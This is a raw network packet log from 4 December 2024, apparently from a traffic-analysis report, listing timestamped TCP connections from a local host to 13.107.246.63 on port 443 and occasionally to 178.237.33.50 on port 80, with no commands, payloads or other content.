                                                                                                                                                                                  Dec 4, 2024 11:11:22.193279982 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:22.195974112 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:22.196008921 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:22.196063995 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:22.196237087 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:22.196248055 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:22.521941900 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:22.524960995 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:22.525114059 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:22.525194883 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:22.525194883 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:22.525213003 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:22.525223017 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:22.528162956 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:22.528224945 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:22.528522968 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:22.528522968 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:22.528557062 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:22.583100080 CET4974280192.168.2.4178.237.33.50
                                                                                                                                                                                  Dec 4, 2024 11:11:22.654241085 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:22.661017895 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:22.661017895 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:22.661041975 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:22.661057949 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:22.722069025 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:22.724555969 CET49926443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:22.724601030 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:22.725152969 CET49926443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:22.725167036 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.088684082 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.088704109 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.089904070 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.089926004 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.090297937 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.090316057 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.090348959 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.090431929 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.090459108 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.090560913 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.094806910 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.094839096 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.098304033 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.102098942 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.102114916 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.158078909 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.158098936 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.158196926 CET49926443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.158226967 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.158533096 CET49926443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.158533096 CET49926443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.158554077 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.158736944 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.158771992 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.158907890 CET49926443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.162026882 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.162069082 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.162250042 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.162497997 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.162509918 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.306094885 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.306720018 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.306732893 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.307533979 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.307539940 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.740644932 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.744153023 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.744194984 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.744239092 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.744266033 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.744318008 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.744328976 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.744338989 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.744343042 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.746578932 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.746620893 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.746686935 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.746855021 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.746869087 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.879050970 CET4974280192.168.2.4178.237.33.50
                                                                                                                                                                                  Dec 4, 2024 11:11:23.993879080 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.994370937 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.994386911 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:23.994834900 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:23.994838953 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.247577906 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.251297951 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.251310110 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.251794100 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.251799107 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.438925982 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.438987970 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.439101934 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.439271927 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.439289093 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.439301014 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.439306021 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.442065954 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.442097902 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.442230940 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.442830086 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.442842960 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.683507919 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.687135935 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.687180996 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.687182903 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.687225103 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.687289953 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.687308073 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.687329054 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.687335014 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.689755917 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.689800024 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.689968109 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.690160990 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.690181017 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.824239016 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.825031996 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.825056076 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.825620890 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.825625896 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.945380926 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.945972919 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.946000099 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:24.946527004 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:24.946532965 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.260168076 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.263848066 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.263904095 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.263988018 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.264009953 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.264023066 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.264028072 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.268060923 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.268085957 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.268142939 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.268321991 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.268342018 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.390603065 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.393709898 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.393759966 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.393773079 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.393841028 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.394062996 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.394084930 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.394104004 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.394109964 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.398360014 CET49937443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.398399115 CET4434993713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.398473024 CET49937443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.398694992 CET49937443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.398710012 CET4434993713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.466692924 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.468482018 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.468506098 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.468931913 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.468938112 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.903382063 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.906388998 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.906452894 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.906532049 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.906552076 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.906563997 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.906569004 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.910043001 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.910126925 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:25.910196066 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.910459995 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:25.910482883 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.226162910 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.227777004 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:26.227811098 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.228234053 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:26.228240967 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.285299063 CET4974280192.168.2.4178.237.33.50
                                                                                                                                                                                  Dec 4, 2024 11:11:26.410118103 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.411411047 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:26.411428928 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.411896944 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:26.411904097 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.672050953 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.675754070 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.675818920 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.676002979 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:26.676151037 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:26.676151037 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:26.676167965 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.676175117 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.682205915 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:26.682245970 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.686450005 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:26.686450005 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:26.686482906 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.844868898 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.848051071 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.848185062 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:26.848268032 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:26.848287106 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.848319054 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:26.848325014 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.851057053 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:26.851078987 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:26.851203918 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:26.851336002 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:26.851351023 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.050107002 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.050684929 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.050714016 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.054394007 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.054399014 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.113493919 CET4434993713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.114075899 CET49937443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.114099979 CET4434993713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.114660025 CET49937443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.114665031 CET4434993713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.493851900 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.498043060 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.498092890 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.498101950 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.498141050 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.498195887 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.498214960 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.498228073 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.498234034 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.500854969 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.500888109 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.500946999 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.501118898 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.501133919 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.547893047 CET4434993713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.551461935 CET4434993713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.551523924 CET49937443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.559171915 CET49937443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.559186935 CET4434993713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.559196949 CET49937443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.559202909 CET4434993713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.562489986 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.562530041 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.562586069 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.562753916 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.562768936 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.627758026 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.628396034 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.628412962 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:27.628844023 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:27.628849030 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.072896004 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.073076010 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.073127031 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:28.073327065 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:28.073345900 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.073359013 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:28.073364019 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.077326059 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:28.077368975 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.077424049 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:28.077603102 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:28.077616930 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.403950930 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.404537916 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:28.404557943 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.405066967 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:28.405083895 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.582509041 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.589708090 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:28.589739084 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.590303898 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:28.590310097 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.838203907 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.842284918 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.842338085 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.842438936 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:28.842438936 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:28.842612982 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:28.842632055 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.845037937 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:28.845073938 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:28.845330954 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:28.845531940 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:28.845546007 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.016836882 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.020724058 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.020895958 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.022828102 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.022849083 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.026153088 CET49945443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.026201010 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.026298046 CET49945443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.026948929 CET49945443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:29.026962042 CET4434994513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.217550993 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:29.218461990 CET49941443192.168.2.413.107.246.63
